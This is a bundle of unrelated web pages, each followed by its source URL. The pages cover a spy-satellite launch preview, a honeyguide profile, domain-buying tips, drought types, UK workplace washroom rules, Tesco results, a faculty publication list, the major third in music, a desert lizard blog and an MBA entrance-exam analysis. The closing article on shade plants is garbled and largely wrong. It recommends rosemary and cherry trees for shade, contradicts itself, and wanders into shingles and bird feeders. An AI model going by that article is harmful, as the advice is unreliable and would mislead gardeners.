Both rockets can place payloads in GTO, but the size of the payload varies big time. The Delta IV Medium can place a 9,280-pound payload in GTO. The Delta IV Heavy increases that to 30,440 pounds. The low-Earth orbit (LEO) payloads sit at 20,250 pounds and 62,540 pounds, respectively.
Note: The payload numbers vary on ULA’s website. A separate page shows payload performance for LEO at 49,740 pounds and GTO at 28,620 pounds.
What will NROL-37 do? All we have is the mission description via ULA: The mission will be launched for National Reconnaissance Office in support of national defense. Translation? It’s a spy satellite built to do spy things.
A geosynchronous orbit is perfect for an intelligence gathering satellite. Because the orbit is designed to match Earth’s rotation, NROL-37 will always be above the same point on Earth. This orbit is common in other satellites too including weather and communications.
Watch it live. At 1:59 pm ET, the Delta IV Heavy will lift off from Cape Canaveral Air Force Station, Space Launch Complex 37B. That’s the plan anyways. The launch window is from 1:59 – 6:35 pm ET. But the weather might not cooperate. ULA says there’s a 40% chance of favorable weather for today’s launch.
ULA’s webcast starts 20 minutes before launch. Check it out here.
See a rocket launch in person. Unfortunately, the LC-39 Observation Gantry is sold-out for today’s launch. But, if you’re going to be near Cape Canaveral on June 14, swing by and watch SpaceX’s Falcon 9 rocket send two communications satellites into space. | https://www.newsledge.com/watch-spy-satellite-launch-later-today/ |
Introduction: The lesser honeyguide (Indicator minor) is a solitary bird that inhabits woodland and savannah, riverine forest, forest fringes, parks and gardens and plantations. A series of deliberate notes are delivered from traditional song posts with the male being vocal in the morning and early afternoon. The same song posts may be used for years. Lesser honeyguides attack small birds that perch nearby. Bird baths are a favoured watering hole.
Distribution: Central and northern Namibia including Etosha National Park, Caprivi, central highlands. Absent from Namib Desert.
Diet: Insects are eaten from the leaves and branches, as well as crevices in bark and holes in trees. Mayflies, ants, caterpillars and spiders.
Description: A smaller version of the greater honeyguide although different markings and identification. Plumage is green, brown and grey with long pointed wings. Their skin is characterisable tough, perhaps resistant to bee stings.
Breeding: Eggs are laid at 2 day intervals, from 2 to 7. Incubation periods are 12 days. Juveniles leave the nest after 37 to 38 days and do not return.
Size: 15cm.
Weight: 28g.Birds of Namibia Wildlife of Namibia
Sorry, we can’t seem to find any matches for your search. Have a look at our popular searches below. | https://namibian.org/nature/birds/piciformes/lesser-honeyguide |
How to Search for a Domain Name: 6 Domain Purchasing Best Practices
Not everyone is truly aware of the ramifications of buying a domain. There are many factors to consider in order to make a good purchase and later avoid undesirable connections to, say, malicious individuals and their networks. So, how could a domain name be dangerous, after all? Those in the cybersecurity industry know that cyber attackers can weaponize a domain name for use against organizations and networks.
This article aims to shed light on why domain buyers, such as those without cybersecurity or marketing know-how, should conduct some research on domains of interest with the help of tools such as WHOIS Lookup, Domain Availability API or Domain Research Suite.
Where Should You Buy a Domain?
Ideally, you should purchase a domain from a well-established registrar rather than from a fly-by-night reseller. Although they’ve fallen victim to hacking incidents in the past, domain providers like Network Solutions, Domain.com, and MarkMonitor are reputable companies in this area.
GoDaddy and Namecheap are also popular domain providers, although their reputations may have suffered in recent years due to attacks. They are, however, still well-recognized in the industry. In short, it’s usually better to buy domains from companies that have been operating for years, rather than the newer ones.
How to Choose the Right Domain
Below are some straightforward tips for users in search of domains to either use for their websites or add to their existing portfolios:
- Look into safe top-level domain (TLD) extensions: Watch out for commonly abused TLDs. For instance, domains ending in .tk, .xyz, .work, and .top are just a few of the most abused domains. Several country-code top-level domains (ccTLDs), such as .eu (European Union), .ru (Russia), .ga (Gabon), and .pw (Palau), are also among offenders’ favorites. Whether you’re a domainer or not, make it a habit to check domain blacklists regularly.
- Examine WHOIS data if the domain was previously registered: A domain may have had ties to malicious campaigns that the average website or domain buyers may not be aware of. Some may have been configured using a domain generation algorithm (DGA) or hijacked before. That said, it is crucial to retrieve a domain’s historical WHOIS records with web-based solutions like WHOIS History Search to find out how its ownership has changed over the years.
- Consider keyword optimization: Exact-match domains (EMDs) may not be as relevant today, but they still work. Consider using keywords with decent search volumes in your domain name to help it rank high in search engine results pages (SERPs).
- Avoid using numbers, hyphens, and unusual characters: Keep domain names short and sweet for search engine readability. Bots don’t appreciate hyphens and random characters in domain names, and you need those bots to index your domain.
- Check the domain for potential trademark or cybersquatting violations: Make sure the domain doesn’t infringe on the copyright of existing brands or isn’t a look-alike of another. You can search the World Intellectual Property Organization (WIPO) database to verify if a given domain is associated with any brand mark.
- Revisit your brand guidelines: How does the domain fit into your overall brand strategy? Is it aligned with your brand messaging and usage policies? Ensure that it does before adding it to your cart.
Enter WHOIS Lookup, Domain Availability API, and Other Tools
WHOIS Lookup, Domain Availability API, and its restful counterpart Domain Availability Check are domain search engines that allow users to check the availability of any domain and gather more details about current domain owners. They are excellent tools for entrepreneurs, registrars, marketers, and domain investors to confirm whether a domain they’re eyeing can be registered. They benefit domain buyers with these objectives:
- Domain name monitoring: As mentioned, Domain Availability API allows you to determine when a domain is up for purchase. Set up alerts using another tool like Domain Monitor to find out when a domain is expiring. For domainers, being first in line for domains that are sure to sell is a must, and so, expiration alerts are beneficial.
- Search engine marketing: The API can quickly help you check if domains, especially those that get a lot of traffic, are up for registration and who currently owns them for possible purchases and negotiations.
- Avoiding domain name front-running: Use Domain Availability API to search for domains you wish to purchase to prevent registrars from reserving them ahead of you—a practice known as front-running. Registrars do this to sell seemingly trendy and profitable domains at a higher price in the future.
Our domain research tools are among the most popular and accurate in the market today due to our long-standing relationship with internet infrastructure providers. Our database has crawled over 774 million domains and 15.6B+ WHOIS records over the past decade, which explains the tools’ lookup speed and accuracy.
Contrary to popular belief, so much work goes into domain buying—if you’re serious about making a profit off your site or want your audience to find it. Check any domain’s availability with a tool such as Domain Availability API and more details with WHOIS Lookup and the Domain Research Suite so as to be first in line to grab your domains of interest with the necessary domain intelligence. | https://whois.whoisxmlapi.com/blog/how-to-search-for-a-domain-name-6-domain-purchasing-best-practices |
Actions
What to know: Types of droughts and how they impact you
FILE - In this March 5, 2020, file photo, Hunter Maltz, a fish technician for the Yurok tribe, pushes a jet boat into the low water of the Klamath River at the confluence of the Klamath River and Blue Creek as Keith Parker, as a Yurok tribal fisheries biologist, watches near Klamath, Calif., in Humboldt County. Federal officials announced Wednesday that farmers who rely on a massive irrigation project spanning the Oregon-California border will get 8% of the deliveries they need amid a severe drought. (AP Photo/Gillian Flaccus, File)
SAN DIEGO (KGTV) — Just five months into 2021 and much of California is experiencing some form of drought conditions.
It's an issue that has plagued the Golden State year after year, impacting a variety of sectors of industry, the environment, and daily life.
WHAT IS A DROUGHT?
Drought is considered a deficit of precipitation over a long period of time, resulting in a shortage of water, according to the NOAA's National Integrated Drought Information System.
But this definition can vary by region and reflecting the needs and approaches of said region. Depending on whether a region defines a drought as a concept or idea, or an operational function, that can impact how areas respond to droughts and address them.
FIVE TYPES OF DROUGHT
According to NOAA, scientists have come to define and monitor droughts in five different categories:
Meteorological: When a dry weather pattern dominates the area, leading to drought-like conditions.
Hydrological: When low water supply becomes clearly observed in an area's water system.
Agricultural: When a region's crops become impacted by drought conditions.
Socioeconomic: When the supply and demand of commodities are impacted by drought conditions.
Ecological: When natural ecosystems in a region are impacted by drought.
DROUGHT IMPACTS
As you can expect, droughts can have far-reaching and devastating impacts.
The first impact that many will notice is on agriculture. Drought can reduce the amount of water available that's needed for farms and crops. What many may not expect: it can also lead to insect outbreaks, in addition to wildfire and altering the Earth's water cycle.
Public health is also impacted. Decreased water quantity and quality, increased illness and disease, adverse mental health outcomes, and increased mortality can all result from droughts.
Transportation can be impacted as higher temperatures due to drought can impact roadways, runways, and rail lines. Supply chains also rely on waterways, which can fall victim to severe drought.
Drought can alter and degrade critical functions and operations of the ecosystem, like reducing plant regrowth, threatening local plant species, and prompting landscapes to transition — like a forest becoming grassland.
Wildfire is something Californians know all too well. Drought conditions, brought on by hot, dry, and sometimes windy weather, can dry out vegetation and increase the likelihood of fire.
Droughts also adversely impact water quality. Decreased water levels, warmer temperatures, and soil runoff can lead to algae growth, lower oxygen levels, and more suspended materials in water, all of which can pose a threat to humans and marine life.
WHY IT'S DIFFICULT TO PREDICT DROUGHTS
Droughts come about slowly, so it's difficult to predict a drought event in the same way that meteorologists can predict and monitor hurricanes, tornadoes, or severe weather.
Droughts also differ region to region, so California's droughts may not be exactly the same as a drought elsewhere in the country.
Scientists do their best to monitor drought conditions through a variety of regional changes. An important way to monitor drought is to track precipitation, temperature, streamflow, ground and reservoir water levels, soil moisture, and snowpack. Tracking these indicators can help researchers predict the severity, location, timing, and duration of drought and the expected impact locally.
According to the NOAA, scientists historically only used one indicator to monitor drought. But considering several indicators like the ones above have become more important to develop a clearer picture of drought and its severity in a region.
Source: The National Oceanic and Atmospheric Administration's National Integrated Drought Information System
Copyright 2021 Scripps Media, Inc. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed.
Sign up for the Rebound Newsletter and receive up to date information. | |
A new survey has concluded that one in five small to medium sized businesses in Britain are not providing enough toilets for workers, resulting in wasted working hours as well as negative impacts on staff morale and customer perceptions.
Some 32% of office workers said their business has been negatively affected by the standard of their washrooms, with staff morale and customer perceptions mentioned in responses.
According to the Approved Code of Practice for the Workplace (Health, Safety and Welfare) Regulations 1992, the number of toilets provided by small businesses for employees must increase in line with the number of employees.
Any business with more than five employees, for example, must have at least two toilets available, increasing to a minimum of five for businesses with between 76 and 100 employees.
Adequate sanitary facilities must be readily available to all building occupants. The location of the facilities should be within reasonable distance from the workplace. Where public access is also needed, the facilities must be increased.
Key considerations for the facilities manager include the following.
Enough toilets and washbasins should be supplied for those expected to use them.
Facilities should have hot and cold running water and enough soap or other washing agents.
Specific facilities must be provided separately for disabled people.
Showers and/or baths must be provided where work functions are particularly strenuous or dirty or where contamination can occur.
Special drench facilities must be installed close to all hazardous workstations, e.g. acid processes.
Permanent water and drain systems should be connected to all sanitary facilities, unless the facility is of a temporary nature.
Where possible, separate facilities for men and women, and failing that, rooms with lockable doors, must be provided.
Facilities must be clean, and walls and floors should preferably be tiled or covered in waterproof material for easier cleaning.
A supply of toilet paper is essential and, for female employees, a means of disposing of sanitary dressings.
A suitable number of toilets should be provided for the use of those expected to use them. People should not have to queue for long periods to go to the toilet.
In most workplaces toilets should be provided within the premises themselves. So far as is reasonably practicable, facilities need to include flushing toilets and running water. Portable cabins converted into toilet facilities are available from hire companies for use at temporary worksites. Chemical toilets and water containers should only ever be used as a short-term measure and use of public toilets and washing facilities should be a last resort and not used just because they are the cheaper option.
Toilets are now mainly of the close-coupled type where the flushing cistern is directly above and behind the closet. Furthermore, most modern toilet units incorporate a two-stage flushing effect (reducing the amount of water consumed) and reduced capacity with the same flush effect.
As human perception of hygiene and concern over disease increases, maintenance hygiene is more critical than ever.
No room containing a sanitary convenience should communicate directly with a room where food is processed, prepared or eaten.
Washing facilities, including showers if required by the nature of the work, must be provided at readily-accessible places.
Wash basins must be large enough to wash hands and forearms if necessary. Hot (or warm) and cold running water as well as soap and clean towels or other means of drying, e.g. hot-air dryers, must all be provided.
Showers must be provided if dirty work is being carried out. Men and women should have separate toilet and shower facilities unless each facility is in a separate room with a lockable door, and is for use by only one person at a time.
There are separate facilities for men and women, except where and so far as they are provided in a room the door of which is capable of being secured from inside and the facilities in each such room are intended to be used by only one person at a time.
Wash basins should be fitted with suitable taps or mixers. In many workplace toilets, water saving taps are used which are designed to reduce the amount of water wasted. Some taps have flow regulators or aerators to ensure that water does not reach full flow. Others close off after a short period of time. Some are activated by a movement sensor which means that hand contact does not actually have to be made with the tap, thus reducing capacity for infections to be passed on.
An additional toilet and one additional washing station should be provided for every 25 people above 100. For toilets used only by men, an additional water closet for every 50 men above 100 is sufficient, but only if at least an equal number of additional urinals are provided.
Toilets should contain toilet paper in a holder or dispenser and a coat hook. Suitable sanitary bins should be provided in female toilets.
Rooms containing sanitary conveniences or washing facilities should be kept clean. This not only includes the physical parts, e.g. walls and floors, but also emptying and cleaning of sanitary disposal units and nappy bins, etc. Toilets should be kept appropriately sanitised and have a pleasant, hygienic and fresh smell.
Soap dispensers and hand drying facilities should be provided and replenished on a regular basis. Liquid soap dispensers which create no mess and which are robust in design are to be preferred, as well as disposable towels rather than fabric towels.
A cleaning schedule should be kept which should list daily cleaning tasks; this should include all toilet areas. The facilities manager must ensure that cleaning staff or contractors make at least one daily visit to keep surfaces clean. A common practice is to display a chart in toilet areas to record each cleaning event. Monthly deep cleans need to be carried out to keep sanitary ware clear of verdigris (green rust on copper or brass) and lime scale, and high-level surfaces clean. Spillages also need to be cleaned promptly.
The responsibility for cleaning should be clear, particularly where facilities are shared by more than one workplace. | https://seton.co.uk/legislationwatch/article/sub-standard-washrooms-affecting-staff-morale/ |
LONDON (Reuters) – Britons have carried on spending despite their “Brexit fatigue,” Tesco said yesterday, as a forecast-beating rise in profits confirmed a turnaround at Britain’s biggest retailer.
Mr Lewis said customers had responded well to the company’s “Exclusively at Tesco” brands, with 84 percent of them trying the products.
Customers were suffering “Brexit fatigue”, Mr Lewis said, but were not changing their shopping habits or stockpiling.
“We have been proactive where we can in taking some provision if there were to be a difficulty; that impacts on the timing of the working capital in the business,” Mr Lewis said.
Operating profit jumped 34 percent to 2.21 billion pounds ($2.89 billion) for the year ended Feb 23, while the company declared a dividend of 5.77 pence per share, up 92 percent.
The operating profit margin was 3.79 percent in the second half, excluding Tesco’s acquisition of wholesaler Booker, Mr Lewis said, “comfortably within” the 3.5-4.0 percent target range set for this financial year. | https://www.khmertimeskh.com/50595596/tesco-profits-jump-as-britons-spend-despite-brexit-fatigue/ |
Laci Gerhart-Barley Ph.D.
Lecturer PSOE
2345 Storer Hall
Evolution and Ecology Department
College of Biological Sciences
University of California, Davis
COURSES:
BIS 2B Introduction to Biology: Evolution and Ecology
PUBLICATIONS:
McLauchlan KK†, LM Gerhart†, JJ Battles, JM Craine, AJ Elmore, PE Higuera, MC Mack, BE McNeil, DM Nelson, N Pederson, SS Perakis (2017) Centennial-scale reductions in nitrogen availability in temperate forests of the United States, Scientific Reports, 7:7856 † These authors contributed equally to this work
Li G, LM Gerhart, SP Harrison, JK Ward, JM Harris, IC Prentice (2017) Changes in biomass allocation buffer low CO2 effects on tree growth during the last glaciation. Scientific Reports 7:43087
Carter JM, ME Orive, LM Gerhart, JH Stern*, RM Marchin, J Nagel, JK Ward (2017) Warmest extreme year in U.S. history alters thermal requirements for tree phenology, Oecologia,
183: 1197-2010
Becklin KM, JT Anderson, LM Gerhart, SM Wadhymar, CA Wessinger, JK Ward (2016) Examining plant physiological responses to climate change through an evolutionary lens. Plant Physiology, 172:635-649
Kranabetter JM, KK McLauchlan, SK Enders, JM Fraterrigo, PE Higuera, JL Morris, EB Rastetter, R Barnes, B Buma, D Gavin, LM Gerhart, L Gillson, P Hietz, MC Mack, B McNeil, S. Perakis (2016) A framework to assess biogeochemical responses to ecosystem disturbance using nutrient partitioning ratios. Ecosystems, 19:387-395
Gerhart LM, KK McLauchan (2014) Reconstructing terrestrial nutrient cycling using stable nitrogen isotopes in wood. Biogeochemistry, 120: 1-21
Fuller BT, SM Fahrni, JM Harris, AB Farrell, JB Coltrain, LM Gerhart, JK Ward, RE Taylor, JR Southon (2014) Ultrafiltration for asphalt removal from bone collagen for radiocarbon dating and isotopic analysis of Pleistocene fauna at the tar pits of Rancho La Brea, Los Angeles, California. Quaternary Geochronology, 22:85-98.
Barve, N, AJ Bonilla, J Brandes, JC Brown, N Brunsell, FV Cochran, RJ Crosthwait, J Gentry, LM Gerhart, T Jackson, AJ Kern, KS Oberhauser, HL Owens, AT Peterson, AS Reed, J Soberón, AD Sundberg LM Williams (2012) Climate-change and mass mortality events in overwintering monarch butterflies. La Revista Mexicana de Biodiversidad, 83: 817-824.
Gerhart LM, JM Harris, JB Nippert, DR Sandquist, JK Ward (2012) Glacial trees from the La Brea tar pits show physiological constraints of low CO2. New Phytologist, 194:63-69. | https://ucdber.faculty.ucdavis.edu/laci-gerhart-barley/ |
The major third may be derived from the harmonic series as the interval between the fourth and fifth harmonics. The major scale is so named because of the presence of this interval between its tonic and mediant (1st and 3rd) scale degrees. The major chord also takes its name from the presence of this interval built on the chord's root (provided that the interval of a perfect fifth from the root is also present or implied).
A major third is slightly different in different musical tunings: in just intonation corresponds to a pitch ratio of 5:4 (
A helpful way to recognize a major third is to hum the first two notes of "Kumbaya" or of "When the Saints Go Marching In". A descending major third is heard at the starts of "Goodnight, Ladies" and "Swing Low, Sweet Chariot".
In equal temperament three major thirds in a row are equal to an octave (for example, A♭ to C, C to E, and E to G♯; G♯ and A♭ represent the same note). This is sometimes called the "circle of thirds". In just intonation, however, three 5:4 major thirds are less than an octave. For example, three 5:4 major thirds from C is B♯ (C to E to G♯ to B♯). The difference between this just-tuned B♯ and C, like that between G♯ and A♭, is called a diesis, about 41 cents.
The major third is classed as an imperfect consonance and is considered one of the most consonant intervals after the unison, octave, perfect fifth, and perfect fourth. In the common practice period, thirds were considered interesting and dynamic consonances along with their inverses the sixths, but in medieval times they were considered dissonances unusable in a stable final sonority.
A diminished fourth is enharmonically equivalent to a major third (that is, it spans the same number of semitones). For example, B–D♯ is a major third; but if the same pitches are spelled B and E♭, the interval is instead a diminished fourth. B–E♭ occurs in the C harmonic minor scale.
The major third is used in guitar tunings. For the standard tuning, only the interval between the 3rd and 2nd strings (G to B, respectively) is a major third; each of the intervals between the other pairs of consecutive strings is a perfect fourth. In an alternative tuning, the major-thirds tuning, each of the intervals are major thirds. | https://zims-en.kiwix.campusafrica.gos.orange.com/wikipedia_en_all_nopic/A/Major_third |
I hope there are little things in your life that bring you as much joy as these tiny lizards bring to me. The common side-blotched lizard is the lizard I see most although they can be difficult to photograph because of their small size. Most of the time I just watch them sunning themselves or scurrying about and am thankful they are there, and I with them.
Tag Archives: Granite Mountain
Who Am I?
I am not broccoli.
I am tall, taller than you.
I am rare, doubly so.
I am a double crested saguaro. While most saguaros have tips of the familiar shape, some grow into fan-like shapes know as crests. Crested saguaros are rare, this one has two crests. This is the only one I’ve seen so far, a reader pointed out its location near Granite Mountain where the Coyote Canyon Trail meets the Desperado Trail in McDowell Sonoran Preserve.
Bringing Balance to the Universe
Balanced Rock with Brown’s Mountain on the left and Cholla Mountain on the right. Brown’s Mountain and Cone Mountain (out-of-frame to the left) have a nice cone shape, while Cholla Mountain and Granite Mountain (behind me) look like someone piled up a bunch of granite boulders on top of each other. Balanced Rock sits between, a reminder of the strength and beauty in diversity.
Shrike One! Shrike Two!
When I saw this loggerhead shrike on an off-map trail near Granite Mountain I assumed it was my first one in Arizona but not my first one ever, having seen them in Washington. Except I hadn’t, when I got home and checked my notes I realized the shrikes in Washington were northern shrikes so this was both my second shrike and a new species for me. In my defense I rarely saw shrikes there or here.
The Woodpecker
Calling Out
A rock squirrel calls out atop a large granite boulder near Granite Mountain. It had a piece of saguaro fruit but instead of eating it was sending out the alarm for much of the time I watched it during a food and water break. At first I thought it was complaining about me to the other nearby squirrels, even though I was far down the hill, but it kept looking in other directions and went quiet for a while before starting up again. It has lots of enemies in the desert, most of whom would not have been visible from my vantage point, but I haven’t spent much time with these squirrels yet to get a feel if it was sending out an alarm or claiming this spot as its own.
A Little Beauty
One of the difficulties I had when learning to identify lizards after we moved here was getting a feel for the size of lizards based on pictures. Guide books have typical measurements but that isn’t as helpful until you can narrow down the search. I wish there was an app that would let you sort them first by geography and then by size. Over time I’ve gotten much better at identifying most of the common lizards including the one I see most often, the common side-blotched lizard.
I met this one in July on the Bootlegger Trail near Granite Mountain, he’s nicely showing off the dark blotch behind his front legs for which he is named as he perches on his own granite mountain. I’ve been getting a bit worn down the past few weeks and have only gone out hiking once each weekend so I’m going to take a couple of days off this week to hopefully recharge a bit. I saw a handful of these little lizards on the trail this morning but didn’t see any opportunities for pictures so I enjoyed my time with them instead.
As for their size, it can be hard to tell from a telephoto shot like this but thy are tiny, typically 1.5″ to 2.5″ SV (snout-to-vent, which goes from the tip of the nose to the vent near the base of the tail). They mostly eat insects and the like but lots of things eat them, including larger lizards. They are active throughout the year at my elevation (at least on warm winter days) so I’m happy they’ll keep me company when the other reptiles are hibernating. | https://boolie.me/tag/granite-mountain/ |
Please take care of yourself. Let us take care of your test preparation. IMS coaching is setback proof and we have activated online live classes for all our students.
Stay Safe, Stay Healthy.
9th February 2019 (9:00 am - 12 Noon)
MICAT or MICA Admission Test is the ONLINE entrance exam for PGDM – C (MBA) from MICA, Ahmedabad. Generally MICAT is held twice for admission to the batch in the ensuing year. MICAT – I in December and MICAT II in February for the batch commencing in June/July.
MICAT II was held on February 9, 2019. The students reported that the paper was the same for everyone with questions in the same order. The on-boarding process of the test was smooth.
MICAT - II replicated MICAT-I in structure, and the difficulty level of different Sections. Like MICAT I, students reported that the General Awareness and Quantitative Analysis sections were difficult.
The Psychometric test was the first section. The Psychometric test had 27 questions. The Descriptive test was the second section. The third section comprised of the 4 usual parts on Divergent Convergent Reasoning, Verbal Ability, Quantitative Analysis and General Awareness.
|Section||Name||No. Of Questions||Time allocated|
|1.||Psychometric||27||25 minutes|
|2.||Descriptive||4||35 minutes|
|3.||A. Divergent Convergent Reasoning||30||105 minutes|
|B. Verbal Ability||25|
|C. Quantitative Ability||25|
|D. General Awareness||25|
The test provided a 1-minute break between the different Sections.
The candidates were not allowed to navigate between sections. The Psychometric and Descriptive tests carried no negative marking. In Section 3, each question was worth 1 mark and attracted negative marks of 0.25 for each incorrect response.
In the previous years, the instructions before the Psychometric test used to inform the students that ‘the Psychometric test was a qualifier and any un-attempted questions would lead to disqualification’.
However, this year’s instructions stated that ‘No marks would be provided for any un-attempted question in the Psychometric test’.
There were 27 questions in this section. In psychometric tests, there are no correct or incorrect responses.
A list of 30 personal traits/characteristics made up the first question. Students had to enter 10 characteristics that would best describe their personalities. A text box was provided at the bottom of the list. The instructions for the question stated that the 10 characteristics had to be entered separated by a comma. For example: the student had to enter 2,4,6,11,15,21,24,25,28,29.
In the next set of questions (Q2-17), there were six options for each question about a particular personality trait. Students had to select any single option. These questions asked one to choose from a set of two arguments and to rate them in accordance with one’s personality traits. One statement was presented on the left and another was on the right side of the screen. The six options from which students needed to mark their answer were:
In the third set of questions (Q 18-27), the students had to rank 6 actions/response sentences in the given question in an order of decreasing importance. Around 10 questions were of this type. For someone accustomed to taking psychometric tests, this section was simple and less time consuming. Students are advised not to have preconceived notions about which option constitutes the perfect answer. Instead, they were asked to attempt each question honestly.
This section tested the analytical and descriptive writing ability and creative skills of test-takers. The total time given for attempting these questions was 35 minutes. The first three questions were related to each other. Students reported that the topic for the first three questions was ‘Does social media presence leads to damage to reputation ’. For the first two questions, students had to write three points each, ‘for’ and ‘against’ the topic. These two questions carried 10 marks each.
In the third question, students had to write a 300 word answer to ‘suggest steps to young professionals on enhancing one’s reputation on social media’. The question clearly stated that the points for the third question should not include the points stated in the first two questions. Twenty marks were allocated to this question.
The fourth question in this section consisted of four pictures. Students had to write down a particular pictorial combination (A-B-C-D or D-C-B-A or any such combination) and explain it with the help of a story. The pictures were related to ‘a design resembling eye glasses on a cloth, some berries, top-view of an office building complex with a couple of tennis courts, and a monster’. This question carried 40 marks.
The Reasoning section combined 30 word-association, statement-assumption, data sufficiency and visual reasoning questions.
|Topic||No. of Qs.||Level|
|Word Association||10||2 Difficult, 5 Moderate, 3 Easy|
|Statement Assumption||3||1 Easy, 2 Moderate|
The non-verbal reasoning questions in the section were of easy-to-moderate level of difficulty. Following was the break-up of the non-verbal reasoning questions in the section:
|Type of questions||Number of questions||Level of difficulty|
|Visual Reasoning (Total 9 questions)|
|Odd man out||2||Easy-Moderate|
|Analogy||5|
|Complete the series||2|
|Logical/Quantitative Data sufficiency (Total 8 questions)|
|Relations.||1||Easy-Moderate|
|Order/Ranking||2||Easy-Moderate|
|Arrangement||2||Easy|
|Profit and Loss, Time & Work||2||Easy-Moderate|
In this section ,19-20 questions in 30 minutes with 80-85% accuracy would be considered a good attempt
This section consisted of jumbled paragraphs, synonyms, double fill in the blanks, sentence errors, paragraph completion, idiom-based questions and a Reading Comprehension passage. Like MICAT 1, only 1 RC passage was present this year. The passage was moderately difficult.
|Topic||No. of Qs.||Level|
|Double FIB||1||1 Moderate|
|Jumbled Paragraph – 4/5 sentences||5||3 Easy, 2 Moderate|
|Identify the correct sentence||2||2 Moderate|
|Synonyms of the highlighted word used in the sentence||1||1 Moderate|
|Reading Comprehension – 1 Passage||5||2 Easy, 3 Moderate|
|Antonym||1||1 Easy|
|Preposition-based FIB (3/4/5 blanks)||4||2 Easy, 2 Moderate|
|Complete the last sentence of the passage||2||2 Moderate|
|Idiom/Phrase-based FIB||4||4 Easy|
In this section, 19-20 questions in about 25 minutes with around 80% accuracy would have been considered a good attempt
There were 25 questions in the section, out of which 18 questions were on quantitative ability and 7 questions were on Data Interpretation. The Quantitative Ability section was dominated by 7 Arithmetic questions followed by 3 questions each of Modern Maths, Numbers and Algebra. Surprisingly, there were 3 questions on Inequalities. There were 2 questions from Geometry. Most of the questions were based on elementary concepts but were time-consuming. Overall, the section was moderate to difficult.
There were two sets on Data Interpretations. Both the sets had questions that were based on calculation. Some students reported ambiguity in some of the questions in the sets. The overall difficulty level of these sets was moderate.
Following was the break-up of the questions in the Quantitative Ability section:
|Types of questions||Number of questions||Level of difficulty|
|Arithmetic|
|Percentages||2||Easy-Moderate|
|Profit & Loss||3||Moderate|
|Mixtures||1||Easy|
|Time Speed & Distance||1||Moderate|
|Numbers|
|BODMAS||1||Moderate|
|Fractions||1||Moderate|
|Properties of Numbers||1||Difficult|
|Modern Maths|
|Set Theory||1||Easy|
|Permutation & Combination||1||Easy|
|Series & sequences||1||Difficult|
|Algebra|
|Inequalities||3||Medium-Difficult|
|Geometry|
|Mensuration||2||1 Medium, 1 Difficult|
|Data Interpretation|
|Bar Graph + Line Graph (Combination chart)||3||Easy-Moderate|
|Bar Graph + Line Graph||4||Moderate|
In this section, an attempt of about 13 - 15 questions in 40 minutes with 85% accuracy would be considered good .
The GA section consisted of 25 questions. Out of 25, 17 were on National issues, 3 were on international topics and 5 were on miscellaneous topics. Also, 12 questions were of static type while 13 were on current affairs. Overall, the section was of the same difficulty level as MICAT I.
The questions were about business, government, politics, appointments, authors and awards.
9 questions could be classified as easy; 11 as medium and 5 as difficult.
In this section, an attempt of 10-11 questions in 10 minutes with 80% accuracy would be considered good .
Students qualifying in the Psychometric and securing an overall score of 47-49 in Sections 3A to 3D can expect a call for the GE-PI round (subject to their fulfilling the other criteria*)
Those who have attempted IMS test pack on MICAT (a series of 5 tests) would have found that the level of difficulty and the nature of the questions in these tests, as well as the structure of the paper were similar to those asked in the actual MICAT. | https://www.imsindia.com/mba-entrance-exam/MICAT/micat-II-february-2019-test-analysis.html |
Are you looking for plants that are shade-tolerant?
Actually, it can be very frustrating if you are confused with what colorful plants grow in the shade. But this article will guide you accordingly.
This is because many beginners think that plants that grow in shade must be weak and are useless because they cannot withstand bright sunshine.
Well, if you think that those plants that grow in the shade won’t work for you then you have to make a wrong assumption and that’s why, you have to get rid of this misconception.
As long as you don’t let this misconception put you off, you will find that you can enjoy a great variety of colors if you know what colorful plants grow in the shade.
As you probably know, there are many different varieties of plants. Some of them grow best in shade but some are also comfortable in the sun.
And depending on your geographical location, you will have to decide what color plants grow in the shade. This is where you have to be very careful as you are buying these plants.
The first thing you need to know is how much light you need for your plants.
A lot of beginners make the mistake of assuming that plants that grow in shade should be kept under shade by themselves. But this is not the case.
Plants that grow in shade are not dependent on the sunlight alone. It is also the moisture in the soil and other environmental factors that determine whether or not the plants can survive or not.
Plants that grow in shade don’t need much sunlight at all. So when it comes to plants that grow in shade, you should focus on the amount of sunlight that you get which is not too low.
Next, you need to determine which plants need more water. Again, this depends on your geographical location.
Most of the tropical plants need a lot of water, but the palms, palms trees, and some other plants do not need a lot of water.
Shade is good for all plants. The most important thing to keep in mind is that there is no such thing as plants that grow in shade that require less sunlight than others.
If you want to know what plants grow in shade, focus on the quality of the sunlight, the type of plant and the climate in your locality.
What plants are best for shaded areas?
Is the sun shining on your backyard, but you’re having trouble choosing what plants to plant there?
Then the right question to ask is, “What plants are best for shaded areas?” Here’s a look at what plants make good choices in this situation.
Shade can be more than just under the tree and that’s pretty much what it is.
If it’s a cold climate and you aren’t getting direct sunlight, you’ll want to make sure that you plant trees or shrubs that do well in this area. One of the plants that will grow well in this situation is cedar.
Cedar
Cedar is one of the softest of the hardwoods and a good thing because the cedar can rot when you have deer in your garden.
But you do get great shade from the cedar and you also have the advantage of keeping the deer out.
Rosemary
Another of the things that is a good choice in this situation is Rosemary. The Rosemary does well in shaded areas and it can add a lot of color to the flowers.
You can also plant the Rosemary around and under the flowering plants if you’d like to help them along.
Cherry tree
The cherry tree is also a very good choice in a shaded area. Cherry trees are known for their longevity and are one of the longest lasting trees.
So these can be a great choice for any area where there isn’t much shade.
They also have the benefit of giving you that beautiful yellow color that will help bring out your flowers, as well as you garden.
The purple heart hydrangea
This is another plant that will add color to the ground around your garden.
This is a little more expensive than the others, but it is worth it to pay for the color and beauty of this flowering plant.
When growing purple heart hydrangeas, it’s important to make sure that you water them well.
The ultimate way to use the wood from a tree is to build a house out of it. And the shingles that are used to make these houses are also perfect for being in a shaded area.
And as far as power is concerned, they are extremely strong, so they can withstand the wind and the cold winter months.
The Tart Cherry
The Tart Cherry is another one of the plants that are beautiful in the fall.
The Tart Cherry is a slow growing tree, so it will take several years for this tree to mature, and it can even be over 100 years old.
Tart cherries will add color to your yard and you can also add some pretty flowers to your garden.
With a little bit of effort, you can make a big difference in the looks of your yard. So use the birds and the squirrels to your advantage and plant some nice flowers to the bird feeders.
Plant some shrubs and the trees that will add color to your yard and you will be very pleased with the results.
What is the best ground cover for shaded areas?
Many people have seen a lot of ground to cover offered for those in the U.K., but not many of them know that there are options for the European countries, too.
Knowing that ground cover is best for one’s particular environment is a great way to keep plants healthy and in shape.
These factors should also play a role in choosing the right type of ground cover for any given climate or situation.
